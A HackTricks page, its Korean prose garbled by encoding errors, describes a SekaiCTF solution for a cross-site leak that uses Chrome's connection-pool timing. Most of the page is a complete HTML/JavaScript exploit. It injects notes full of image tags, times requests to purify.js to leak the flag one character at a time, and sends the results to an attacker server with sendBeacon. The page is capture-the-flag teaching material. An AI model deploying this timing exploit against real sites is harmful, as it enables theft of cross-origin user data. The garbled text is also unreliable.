Connection Pool by Destination Example

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

In this exploit, @terjanq๋Š” ๋‹ค์Œ ํŽ˜์ด์ง€์— ์–ธ๊ธ‰๋œ ๋ฌธ์ œ์— ๋Œ€ํ•œ ๋˜ ๋‹ค๋ฅธ ํ•ด๊ฒฐ์ฑ…์„ ์ œ์•ˆํ•ฉ๋‹ˆ๋‹ค:

Connection Pool by Destination Example

์ด exploit๊ฐ€ ์–ด๋–ป๊ฒŒ ์ž‘๋™ํ•˜๋Š”์ง€ ์‚ดํŽด๋ณด๊ฒ ์Šต๋‹ˆ๋‹ค:

  • ๊ณต๊ฒฉ์ž๋Š” ๊ฐ€๋Šฅํ•œ ํ•œ ๋งŽ์€ <img ํƒœ๊ทธ๊ฐ€ ๋กœ๋”ฉ๋˜๋Š” **/js/purify.js**๋ฅผ ํฌํ•จํ•œ ๋…ธํŠธ๋ฅผ ์ฃผ์ž…ํ•ฉ๋‹ˆ๋‹ค(์›๋ณธ์„ ์ฐจ๋‹จํ•˜๊ธฐ ์œ„ํ•ด 6๊ฐœ ์ด์ƒ).
  • ๊ทธ๋Ÿฐ ๋‹ค์Œ, ๊ณต๊ฒฉ์ž๋Š” ์ธ๋ฑ์Šค 1์˜ ๋…ธํŠธ๋ฅผ ์ œ๊ฑฐํ•ฉ๋‹ˆ๋‹ค.
  • ๊ทธ ํ›„, ๊ณต๊ฒฉ์ž๋Š” [๋‚จ์•„ ์žˆ๋Š” ๋…ธํŠธ๋กœ ๋ด‡์ด ํŽ˜์ด์ง€์— ์ ‘๊ทผํ•˜๊ฒŒ ๋งŒ๋“ค๊ณ  **victim.com/js/purify.js**์— ์š”์ฒญ์„ ๋ณด๋ƒ…๋‹ˆ๋‹ค] ๊ทธ๋ฆฌ๊ณ  ๊ทธ ์š”์ฒญ์˜ ์‹œ๊ฐ„์„ ์ธก์ •ํ•ฉ๋‹ˆ๋‹ค.
  • ์‹œ๊ฐ„์ด ๋” ํฌ๋ฉด, ์ฃผ์ž…์ด ๋‚จ์•„ ์žˆ๋Š” ๋…ธํŠธ์— ์žˆ์—ˆ๊ณ , ์‹œ๊ฐ„์ด ๋” ๋‚ฎ์œผ๋ฉด, ํ”Œ๋ž˜๊ทธ๊ฐ€ ๊ทธ ์•ˆ์— ์žˆ์—ˆ์Šต๋‹ˆ๋‹ค.

Tip

์†”์งํžˆ, ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์ฝ์œผ๋ฉด์„œ ๊ณต๊ฒฉ์ž๊ฐ€ ๋ด‡์ด img ํƒœ๊ทธ๋ฅผ ํŠธ๋ฆฌ๊ฑฐํ•˜๊ธฐ ์œ„ํ•ด ํŽ˜์ด์ง€๋ฅผ ๋กœ๋“œํ•˜๊ฒŒ ๋งŒ๋“œ๋Š” ๋ถ€๋ถ„์„ ๋†“์ณค์Šต๋‹ˆ๋‹ค. ์ฝ”๋“œ์—์„œ ๊ทธ๋Ÿฐ ๋‚ด์šฉ์€ ๋ณด์ด์ง€ ์•Š์Šต๋‹ˆ๋‹ค.

<html>
<head>
<script>
const SITE_URL = "https://safelist.ctf.sekai.team/"
const PING_URL = "https://myserver"
function timeScript() {
return new Promise((resolve) => {
var x = document.createElement("script")
x.src =
"https://safelist.ctf.sekai.team/js/purify.js?" + Math.random()
var start = Date.now()
x.onerror = () => {
console.log(`Time: ${Date.now() - start}`) //Time request
resolve(Date.now() - start)
x.remove()
}
document.body.appendChild(x)
})
}

add_note = async (note) => {
let x = document.createElement("form")
x.action = SITE_URL + "create"
x.method = "POST"
x.target = "xxx"

let i = document.createElement("input")
i.type = "text"
i.name = "text"
i.value = note
x.appendChild(i)
document.body.appendChild(x)
x.submit()
}

remove_note = async (note_id) => {
let x = document.createElement("form")
x.action = SITE_URL + "remove"
x.method = "POST"
x.target = "_blank"

let i = document.createElement("input")
i.type = "text"
i.name = "index"
i.value = note_id
x.appendChild(i)
document.body.appendChild(x)
x.submit()
}

const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms))
// }zyxwvutsrqponmlkjihgfedcba_
const alphabet = "zyxwvutsrqponmlkjihgfedcba_"
var prefix = "SEKAI{xsleakyay"
const TIMEOUT = 500
async function checkLetter(letter) {
// Chrome puts a limit of 6 concurrent request to the same origin. We are creating a lot of images pointing to purify.js
// Depending whether we found flag's letter it will either load the images or not.
// With timing, we can detect whether Chrome is processing purify.js or not from our site and hence leak the flag char by char.
const payload =
`${prefix}${letter}` +
Array.from(Array(78))
.map((e, i) => `<img/src=/js/purify.js?${i}>`)
.join("")
await add_note(payload)
await sleep(TIMEOUT)
await timeScript()
await remove_note(1) //Now, only the note with the flag or with the injection existsh
await sleep(TIMEOUT)
const time = await timeScript() //Find out how much a request to the same origin takes
navigator.sendBeacon(PING_URL, [letter, time])
if (time > 100) {
return 1
}
return 0
}
window.onload = async () => {
navigator.sendBeacon(PING_URL, "start")
// doesnt work because we are removing flag after success.
// while(1){
for (const letter of alphabet) {
if (await checkLetter(letter)) {
prefix += letter
navigator.sendBeacon(PING_URL, prefix)
break
}
}
// }
}
</script>
</head>
<body></body>
</html>

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ